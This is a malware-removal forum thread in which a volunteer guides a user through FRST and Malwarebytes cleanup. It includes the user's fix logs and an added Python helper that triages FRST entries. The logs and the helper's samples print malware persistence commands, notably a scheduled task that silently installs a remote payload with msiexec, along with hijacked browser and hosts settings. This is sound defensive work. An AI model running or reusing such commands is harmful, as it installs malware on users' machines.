
Kitty.exe Snare, Mio, etc


12 replies to this topic

#1 palaboyako

  • Members
  • 13 posts

Posted 28 April 2017 - 10:34 AM

Hello,

I have the same issue as Sam's on this link: https://www.bleepingcomputer.com/forums/t/644913/kittyexe-virus-snare-winsapsvc-firefox-getting-install-automatically/

I have followed the instructions up to running the Farbar.

Please find attached log files.

Many thanks for helping.

Attached Files




#2 fireman4it

    Bleepin' Fireman

  • Malware Response Team
  • 13,505 posts
  • Gender:Male
  • Location:Greenup, Ill USA

Posted 28 April 2017 - 10:53 AM

Hello
  •   Welcome to Bleeping Computer.
  •   My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  •   Refrain from making any changes to your computer, including installing/uninstalling programs, deleting files, modifying the registry, and running scanners or tools.
  •   If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  •   Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  •   In the upper right hand corner of the topic you will see a button called Follow This Topic. I suggest you click it, select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic, which facilitates the cleaning of your machine.
  •   Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.
1.
Download the attached fixlist.txt file and save it to the Desktop.

NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished, FRST will generate a log on the Desktop (Fixlog.txt). Please post it in your reply.

2.
Download Malwarebytes Anti-Rootkit Supplement from here

Once you have downloaded the tool (contained in a .zip folder), you will need to extract the contents. We recommend extracting to your desktop.

To extract the files, locate the zipped folder that you want to unzip (extract) files or folders from. To unzip all the contents of the zipped folder, press and hold (or right-click) the folder, select Extract All, and then follow the instructions. Save them on your desktop.

After the files are extracted, double-click the mbar.cmd file. If you are unsure which file this is, try double-clicking both files named mbar - only one of them will run.

Update the Database, then click on Next, then on Scan.
  • Let it complete its scan (this can take a while);
  • Once the scan is done, make sure that every item is checked, and click on the Cleanup button (a reboot might be required);
  • After that (and the reboot, if one was required), go back in the mbar folder and look for a text file called mbar-log-TODAY'S-DATE.txt;
  • Copy/paste the content of that log in your next reply.
Things to include in your next reply:
Fixlog.txt
Mbar log
How is the computer running now?

"Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


If I have helped you, consider making a donation to help me continue the fight against Malware!


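As an added example (not code from this thread, from FRST or from Malwarebytes), the Python helper below reads FRST entries of the kinds quoted in the fixlist later in this thread (scheduled tasks, services, ShellExecuteHooks and Firefox ExtraCheck lines) and attaches defender-side reasons why each load point deserves a look before it goes into a fixlist. The `Finding`, `triage` and `summarize` names are mine, the sample lines are constructed after the thread's entries with the download host replaced by a placeholder, and the heuristics produce leads to verify by hand, not verdicts.

```python
import re
from dataclasses import dataclass, field

# One FRST line type per pattern; FRST prints Windows paths, hence the literal backslashes.
TASK_RE = re.compile(
    r"^Task: \{(?P<guid>[0-9A-Fa-f-]+)\} - System32\\Tasks\\(?P<name>.+?) => (?P<action>.+)$")
SERVICE_RE = re.compile(r"^S\d (?P<name>[^;]+); (?P<image>.+?) \[X\]")
HOOK_RE = re.compile(
    r"^ShellExecuteHooks: (?P<label>.+?) - \{(?P<clsid>[^}]+)\} - (?P<path>.+?) -> (?P<state>.+)$")
FF_RE = re.compile(r"^FF ExtraCheck: (?P<path>.+?) \[[\d-]+\]")
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://", re.IGNORECASE)  # FRST defangs http:// as hxxp://

# Script/installer hosts that a scheduled task rarely needs to launch unattended.
SCRIPT_HOSTS = ("powershell.exe", "msiexec.exe", "wscript.exe", "mshta.exe", "cmd.exe", "rundll32.exe")
# Locations any standard user can write to; persistence here needs no admin rights.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\", "\\users\\public\\")


@dataclass
class Finding:
    kind: str        # task | service | hook | firefox
    name: str        # task name, service name, hook CLSID or pref file name
    target: str      # command line, image path or DLL
    reasons: list = field(default_factory=list)


def _strip_marks(line):
    """Drop FRST's '<==== ATTENTION' flag and '[date] ()' file annotations."""
    line = line.replace("<==== ATTENTION", "")
    return re.sub(r"\s*\[\d{4}-\d{2}-\d{2}\] \(\)", "", line).strip()


def _target_reasons(target):
    low = target.lower()
    reasons = []
    hosts = [h for h in SCRIPT_HOSTS if h in low]
    if hosts:
        reasons.append("launches a script/installer host (%s)" % hosts[0])
    if URL_RE.search(low):
        reasons.append("fetches a remote payload")
    if any(p in low for p in USER_WRITABLE):
        reasons.append("lives in a user-writable profile or temp directory")
    return reasons


def triage(lines):
    """Return a Finding for every FRST line this helper knows how to read; others are skipped."""
    findings = []
    for raw in lines:
        flagged = "<==== ATTENTION" in raw
        line = _strip_marks(raw)
        if m := TASK_RE.match(line):
            f = Finding("task", m["name"], m["action"], _target_reasons(m["action"]))
        elif m := SERVICE_RE.match(line):
            f = Finding("service", m["name"], m["image"], _target_reasons(m["image"]))
            f.reasons.append("FRST marked the service image with [X]")
        elif m := HOOK_RE.match(line):
            f = Finding("hook", m["clsid"], m["path"], _target_reasons(m["path"]))
            f.reasons.append("ShellExecuteHooks is a legacy load point with few legitimate users")
            if m["state"] == "No File":
                f.reasons.append("orphaned: the DLL is already gone")
        elif m := FF_RE.match(line):
            f = Finding("firefox", m["path"].rsplit("\\", 1)[-1], m["path"],
                        ["Firefox autoconfig file can silently override user preferences"])
        else:
            continue
        if flagged:
            f.reasons.append("marked ATTENTION by FRST")
        findings.append(f)
    return findings


def summarize(findings):
    """Count findings per kind, e.g. {'task': 4, 'service': 1}."""
    counts = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


# Constructed sample: entries modelled on this thread's fixlist, with the download host
# replaced by a placeholder and one benign-looking updater task added to show that the
# user-writable-path heuristic also fires on legitimate software and needs a human check.
SAMPLE_LINES = [
    r"Task: {C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1",
    r"Task: {A01FF9B0-E09E-49FB-886A-9BE4C665AE96} - System32\Tasks\Ghuhit => msiexec.exe /i hxxp://cdn.example.invalid/occup.php?p=DISKID /q <==== ATTENTION",
    r"Task: {2C0E5301-2AA3-40BA-94AC-64006EFDED95} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () <==== ATTENTION",
    r"Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\Vendor Updater => C:\Users\palaboy\AppData\Local\Vendor\updater.exe",
    r"ShellExecuteHooks: No Name - {28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} - C:\Users\palaboy\AppData\Roaming\Muqtainzawge\Anisadom.dll -> No File",
    r"S2 Kitty; C:\Users\palaboy\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION",
    r"FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\316140.js [2017-04-28] <==== ATTENTION (Points to *.cfg file)",
    "Boot Mode: Normal",  # not a load point; ignored
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print("[%s] %s: %s\n    %s" % (f.kind, f.name, f.target, "; ".join(f.reasons)))
```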
#3 palaboyako
  • Topic Starter

  • Members
  • 13 posts

Posted 28 April 2017 - 11:34 AM

Thank you.

Please find the logs below:

Fixlog.txt

Fix result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Ran by palaboy (28-04-2017 23:57:05) Run:1
Running from C:\Users\palaboy\Downloads\Programs
Loaded Profiles: palaboy (Available Profiles: palaboy)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Task: {C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {EBA0F338-2EB2-4948-8649-F7CDC000C308} - System32\Tasks\SecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe  <==== ATTENTION
Task: {A01FF9B0-E09E-49FB-886A-9BE4C665AE96} - System32\Tasks\Ghuhit => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&d=20170428 /q <==== ATTENTION
Task: {2C0E5301-2AA3-40BA-94AC-64006EFDED95} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () <==== ATTENTION
Task: {400BB117-4F95-4B1E-AA51-B736F5CD79A7} - System32\Tasks\Grgerygugerdom Controls => C:\Program Files (x86)\Kuvolypumole\sernerge.exe
ShellExecuteHooks: No Name - {28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} - C:\Users\palaboy\AppData\Roaming\Muqtainzawge\Anisadom.dll -> No File
ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\palaboy\AppData\Roaming\Njtain\Qugtthine.dll -> No File
C:\Users\palaboy\AppData\Roaming\Muqtainzawge
C:\Users\palaboy\AppData\Roaming\Njtain
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
GroupPolicy: Restriction - Windows Defender <======= ATTENTION
C:\Program Files (x86)\MIO
C:\Program Files (x86)\UCBrowser
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\316140.js [2017-04-28] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\316140.cfg [2017-04-28] <==== ATTENTION
S2 CuptonySU; "C:\Users\palaboy\AppData\Local\Temp\1\GoogleUpdate.exe" -r [X] <==== ATTENTION
S2 Kitty; C:\Users\palaboy\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION
S2 WinSAPSvc; C:\Users\palaboy\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION
C:\Users\palaboy\AppData\Roaming\WinSAPSvc
C:\Users\palaboy\AppData\Local\Kitty
C:\Users\palaboy\AppData\Local\Temp\1
2017-04-28 22:17 - 2017-04-28 22:19 - 00000000 ____D C:\Program Files\MK
2017-04-28 22:17 - 2017-04-28 22:19 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-04-28 19:26 - 2017-04-28 20:09 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Njtain
2017-04-28 19:26 - 2017-04-28 19:26 - 00006146 _____ C:\Windows\System32\Tasks\Grgerygugerdom Controls
2017-04-28 19:26 - 2017-04-28 19:26 - 00006072 _____ C:\Windows\System32\Tasks\Ghuhit
2017-04-27 18:32 - 2017-04-28 12:35 - 00000000 ____D C:\Windows\psgo
2017-04-27 18:32 - 2017-04-27 18:32 - 00000000 ____D C:\Users\palaboy\AppData\Local\SNARE
2017-04-27 16:15 - 2017-04-27 16:15 - 00000000 ____D C:\Users\palaboy\Downloads\PPA
C:\Users\palaboy\gotomypc_540.exe
Emptytemp:



*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} => key removed successfully
C:\Windows\System32\Tasks\Windows-PG => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EBA0F338-2EB2-4948-8649-F7CDC000C308} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EBA0F338-2EB2-4948-8649-F7CDC000C308} => key removed successfully
C:\Windows\System32\Tasks\SecureUpdater => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SecureUpdater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A01FF9B0-E09E-49FB-886A-9BE4C665AE96} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A01FF9B0-E09E-49FB-886A-9BE4C665AE96} => key removed successfully
C:\Windows\System32\Tasks\Ghuhit => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ghuhit => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C0E5301-2AA3-40BA-94AC-64006EFDED95} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C0E5301-2AA3-40BA-94AC-64006EFDED95} => key removed successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{400BB117-4F95-4B1E-AA51-B736F5CD79A7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{400BB117-4F95-4B1E-AA51-B736F5CD79A7} => key removed successfully
C:\Windows\System32\Tasks\Grgerygugerdom Controls => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Grgerygugerdom Controls => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} => value removed successfully
HKCR\CLSID\{28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => value removed successfully
HKCR\CLSID\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => key not found.
"C:\Users\palaboy\AppData\Roaming\Muqtainzawge" => not found.
"C:\Users\palaboy\AppData\Roaming\Njtain" => not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avg => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
"C:\Program Files (x86)\MIO" => not found.
"C:\Program Files (x86)\UCBrowser" => not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\Wow6432Node\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
C:\Program Files (x86)\mozilla firefox\defaults\pref\316140.js => moved successfully
C:\Program Files (x86)\mozilla firefox\316140.cfg => moved successfully
HKLM\System\CurrentControlSet\Services\CuptonySU => key removed successfully
CuptonySU => service removed successfully
Kitty => service not found.
WinSAPSvc => service not found.
"C:\Users\palaboy\AppData\Roaming\WinSAPSvc" => not found.
C:\Users\palaboy\AppData\Local\Kitty => moved successfully
"C:\Users\palaboy\AppData\Local\Temp\1" => not found.
"C:\Program Files\MK" => not found.
"C:\Program Files (x86)\AlphaGo" => not found.
"C:\Users\palaboy\AppData\Roaming\Njtain" => not found.
"C:\Windows\System32\Tasks\Grgerygugerdom Controls" => not found.
"C:\Windows\System32\Tasks\Ghuhit" => not found.
C:\Windows\psgo => moved successfully
C:\Users\palaboy\AppData\Local\SNARE => moved successfully
C:\Users\palaboy\Downloads\PPA => moved successfully
C:\Users\palaboy\gotomypc_540.exe => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 295263 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 97287987 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 16275081 B
Edge => 21003640 B
Chrome => 0 B
Firefox => 142308594 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 199458816 B
systemprofile32 => 7824384 B
LocalService => 13930 B
NetworkService => 209132858 B
palaboy => 87414225 B

RecycleBin => 0 B
EmptyTemp: => 744.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 23:58:35 ====

 

Mbar.log

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.28.07
  rootkit: v2017.04.02.01

Windows 10 x64 NTFS
Internet Explorer 11.306.10586.0
palaboy :: WIN10 [administrator]

29/04/2017 12:06:33 AM
mbar-log-2017-04-29 (00-06-33).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 271479
Time elapsed: 12 minute(s), 50 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 1
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll (Adware.Elex) -> Delete on reboot. [e6919e58d4d478beba5305550df453ad]

Registry Keys Detected: 2
HKLM\SOFTWARE\jhdbca (Adware.Elex) -> Delete on reboot. [3d3a8472faaef83ec461e88bda2643bd]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AppleCloudSvc (Adware.Elex) -> Delete on reboot. [0a6dd91dd7d183b3a44263e46f9220e0]

Registry Values Detected: 1
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IPHLPSVC\PARAMETERS\PROXYMGR\{C3BFF683-B45B-4501-A87D-F56C7AF4083E}|AutoConfigUrl (Hijack.AutoConfigURL.PrxySvrRST) -> Data: http://web-access.biz/wpad.dat?f19780c295439c0ec98fa18435c7755029825469 -> Delete on reboot. [690ebb3b38702016db947dfe04fd4cb4]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 102
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll (Adware.Elex) -> Delete on reboot. [e6919e58d4d478beba5305550df453ad]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (user_pref("browser.newtab.url", "http://www.initialsite123.com/?z=7d6bf865d98a4370a7728fdg4z5t3c5c0mbb5m3b6q&from=icb&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&type=hp");) Good: () -> Replace on reboot. [eb8cf9fd2088fb3bd423cbc5a9582dd3]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\searchplugins\4iy9tnux.xml (Adware.Elex) -> Delete on reboot. [2d4a34c25d4b23137a7cdeb258a9b44c]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (34.195.153.94 469ba60d9681f961064c-3cca6631dac1b4997db921c060b712f6.r30.cf2.rackcdn.com) Good: () -> Replace on reboot. [0e69bf377e2afe3801002f6349b7a858]
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [9fd83cba8424b2842ad795fd946c47b9]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [cfa87581f0b84aec54ad5042fd03d22e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [c3b4e51112965dd9ab5679190ff13bc5]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [383f18de832522144fb20d856b95ca36]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [ed8aea0c74342c0a35cc4949bc445ca4]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOS) Good: () -> Replace on reboot. [8aed876f3f69092de31e3a58b64a9e62]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [f28571857236d165c43df39f7b85a858]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [c3b49e587c2c67cf8f72e7abec14d927]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
